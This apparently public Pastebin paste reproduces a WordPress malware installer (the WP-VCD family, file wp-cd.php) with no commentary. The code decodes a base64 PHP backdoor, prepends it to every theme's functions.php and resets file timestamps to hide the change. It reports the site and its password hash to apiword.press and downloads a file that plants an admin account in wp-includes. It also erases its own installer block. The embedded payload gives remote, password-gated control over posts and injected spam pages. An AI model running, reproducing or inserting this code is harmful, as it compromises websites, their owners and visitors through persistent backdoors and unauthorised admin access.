API tools faq
paste
Advertisement
vuihocweb

code decode base64 in wp-cd.php attack wp

vuihocweb
Nov 15th, 2016
3,576
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.19 KB | None | 0 0
raw download clone embed print report
  1. //install_code
  2.  
  3.     $install_code = 'PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzsKCQkJCQlmb3JlYWNoICgkd3BkYi0+Z2V0X3Jlc3VsdHMoJ1NFTEVDVCAqIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ3Bvc3RzYCBXSEVSRSBgcG9zdF9zdGF0dXNgID0gInB1Ymxpc2giIEFORCBgcG9zdF90eXBlYCA9ICJwb3N0IiBPUkRFUiBCWSBgSURgIERFU0MnLCBBUlJBWV9BKSBhcyAkZGF0YSkKCQkJCQkJewoJCQkJCQkJJGRhdGFbJ2NvZGUnXSA9ICcnOwoJCQkJCQkJCgkJCQkJCQlpZiAocHJlZ19tYXRjaCgnITxkaXYgaWQ9IndwX2NkX2NvZGUiPiguKj8pPC9kaXY+IXMnLCAkZGF0YVsncG9zdF9jb250ZW50J10sICRfKSkKCQkJCQkJCQl7CgkJCQkJCQkJCSRkYXRhWydjb2RlJ10gPSAkX1sxXTsKCQkJCQkJCQl9CgkJCQkJCQkKCQkJCQkJCXByaW50ICc8ZT48dz4xPC93Pjx1cmw+JyAuICRkYXRhWydndWlkJ10gLiAnPC91cmw+PGNvZGU+JyAuICRkYXRhWydjb2RlJ10gLiAnPC9jb2RlPjxpZD4nIC4gJGRhdGFbJ0lEJ10gLiAnPC9pZD48L2U+JyAuICJcclxuIjsKCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ3NldF9pZF9saW5rcyc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnZGF0YSddKSkKCQkJCQkJewoJCQkJCQkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgYHBvc3RfY29udGVudGAgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAncG9zdHNgIFdIRVJFIGBJRGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkuJyInKTsKCQkJCQkJCQoJCQkJCQkJJHBvc3RfY29udGVudCA9IHByZWdfcmVwbGFjZSgnITxkaXYgaWQ9IndwX2NkX2NvZGUiPiguKj8pPC9kaXY+IXMnLCAnJywgJGRhdGEgLT4gcG9zdF9jb250ZW50KTsKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWydkYXRhJ10pKSAkcG9zdF9jb250ZW50ID0gJHBvc3RfY29udGVudCAuICc8ZGl2IGlkPSJ3cF9jZF9jb2RlIj4nIC4gc3RyaXBjc2xhc2hlcygkX1JFUVVFU1RbJ2RhdGEnXSkgLiAnPC9kaXY+JzsKCgkJCQkJCQlpZiAoJHdwZGItPnF1ZXJ5KCdVUERBVEUgYCcgLiAkd3BkYi0+cHJlZml4IC4gJ3Bvc3RzYCBTRVQgYHBvc3RfY29udGVudGAgPSAiJyAuIG15c3FsX2VzY2FwZV9zdHJpbmcoJHBvc3RfY29udGVudCkgLiAnIiBXSEVSRSBgSURgID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkgLiAnIicpICE9PSBmYWxzZSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoJCQkJCgkJCQljYXNlICdjcmVhdGVfcGFnZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsncmVtb3ZlX3BhZ2UnXSkpCgkJCQkJCXsKCQkJCQkJCWlmICgkd3BkYiAtPiBxdWVyeSgnREVMRVRFIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2RhdGFsaXN0YCBXSEVSRSBgdXJsYCA9ICIvJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndXJsJ10pLiciJykpCgkJCQkJCQkJewoJCQkJCQkJCQlwcmludCAidHJ1ZSI7CgkJCQkJCQkJfQoJCQkJCQl9CgkJCQkJZWxzZWlmIChpc3NldCgkX1JFUVVFU1RbJ2NvbnRlbnQnXSkgJiYgIWVtcHR5KCRfUkVRVUVTVFsnY29udGVudCddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiIC0+IHF1ZXJ5KCdJTlNFUlQgSU5UTyBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFNFVCBgdXJsYCA9ICIvJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndXJsJ10pLiciLCBgdGl0bGVgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ3RpdGxlJ10pLiciLCBga2V5d29yZHNgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2tleXdvcmRzJ10pLiciLCBgZGVzY3JpcHRpb25gID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2Rlc2NyaXB0aW9uJ10pLiciLCBgY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnY29udGVudCddKS4nIiwgYGZ1bGxfY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZnVsbF9jb250ZW50J10pLiciIE9OIERVUExJQ0FURSBLRVkgVVBEQVRFIGB0aXRsZWAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndGl0bGUnXSkuJyIsIGBrZXl3b3Jkc2AgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsna2V5d29yZHMnXSkuJyIsIGBkZXNjcmlwdGlvbmAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGVzY3JpcHRpb24nXSkuJyIsIGBjb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcodXJsZGVjb2RlKCRfUkVRVUVTVFsnY29udGVudCddKSkuJyIsIGBmdWxsX2NvbnRlbnRgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2Z1bGxfY29udGVudCddKS4nIicpKQoJCQkJCQkJCXsKCQkJCQkJCQkJcHJpbnQgInRydWUiOwoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVVJMX0NEIjsKCQkJfQoJCQkKCQlkaWUoIiIpOwoJfQoKCQppZiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyggJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gKS4nIicpID09ICcxJyApCgl7CgkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgKiBGUk9NIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4nIicpOwoJCWlmICgkZGF0YSAtPiBmdWxsX2NvbnRlbnQpCgkJCXsKCQkJCXByaW50IHN0cmlwc2xhc2hlcygkZGF0YSAtPiBjb250ZW50KTsKCQkJfQoJCWVsc2UKCQkJewoJCQkJcHJpbnQgJzwhRE9DVFlQRSBodG1sPic7CgkJCQlwcmludCAnPGh0bWwgJzsKCQkJCWxhbmd1YWdlX2F0dHJpYnV0ZXMoKTsKCQkJCXByaW50ICcgY2xhc3M9Im5vLWpzIj4nOwoJCQkJcHJpbnQgJzxoZWFkPic7CgkJCQlwcmludCAnPHRpdGxlPicuc3RyaXBzbGFzaGVzKCRkYXRhIC0+IHRpdGxlKS4nPC90aXRsZT4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBrZXl3b3JkcykuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IkRlc2NyaXB0aW9uIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBkZXNjcmlwdGlvbikuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0iaW5kZXgsIGZvbGxvdyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIGNoYXJzZXQ9Iic7CgkJCQlibG9naW5mbyggJ2NoYXJzZXQnICk7CgkJCQlwcmludCAnIiAvPic7CgkJCQlwcmludCAnPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCI+JzsKCQkJCXByaW50ICc8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPic7CgkJCQlwcmludCAnPGxpbmsgcmVsPSJwaW5nYmFjayIgaHJlZj0iJzsKCQkJCWJsb2dpbmZvKCAncGluZ2JhY2tfdXJsJyApOwoJCQkJcHJpbnQgJyI+JzsKCQkJCXdwX2hlYWQoKTsKCQkJCXByaW50ICc8L2hlYWQ+JzsKCQkJCXByaW50ICc8Ym9keT4nOwoJCQkJcHJpbnQgJzxkaXYgaWQ9ImNvbnRlbnQiIGNsYXNzPSJzaXRlLWNvbnRlbnQiPic7CgkJCQlwcmludCBzdHJpcHNsYXNoZXMoJGRhdGEgLT4gY29udGVudCk7CgkJCQlnZXRfc2VhcmNoX2Zvcm0oKTsKCQkJCWdldF9zaWRlYmFyKCk7CgkJCQlnZXRfZm9vdGVyKCk7CgkJCX0KCQkJCgkJZXhpdDsKCX0KCgo/Pg==';
  4.  
  5.     $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
  6.     $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  7.  
  8.     if ($wpdb -> query('CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'datalist` ( `url` varchar(255) NOT NULL, `title` varchar(255) NOT NULL, `keywords` varchar(255) NOT NULL, `description` varchar(255) NOT NULL, `content` longtext NOT NULL, `full_content` smallint(6) NOT NULL, PRIMARY KEY (`url`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;'))
  9.         {
  10.             $themes = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
  11.  
  12.             $ping = true;
  13.  
  14.             if ($list = scandir( $themes ))
  15.                 {
  16.                     foreach ($list as $_)
  17.                         {
  18.                             if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  19.                                 {
  20.                                     $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
  21.  
  22.                                     if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  23.                                         {
  24.                                             if (strpos($content, 'WP_URL_CD') === false)
  25.                                                 {
  26.                                                     $content = $install_code . $content ;
  27.                                                     @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
  28.                                                     touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
  29.                                                 }
  30.                                             else
  31.                                                 {
  32.                                                     $ping = false;
  33.                                                 }
  34.                                         }
  35.  
  36.                                 }
  37.                         }
  38.  
  39.                     if ($ping) {
  40.                         $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  41.                         @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
  42.                     }
  43.                 }
  44.         }
  45.  
  46.     if ($file = @file_get_contents(__FILE__))
  47.         {
  48.             $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
  49.             $file = preg_replace('!<\?php\s*\?>!s', '', $file);
  50.             @file_put_contents(__FILE__, $file);
  51.         }
  52.  
  53. //install_code_end
  54.  
  55. ?><?php error_reporting(0);?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!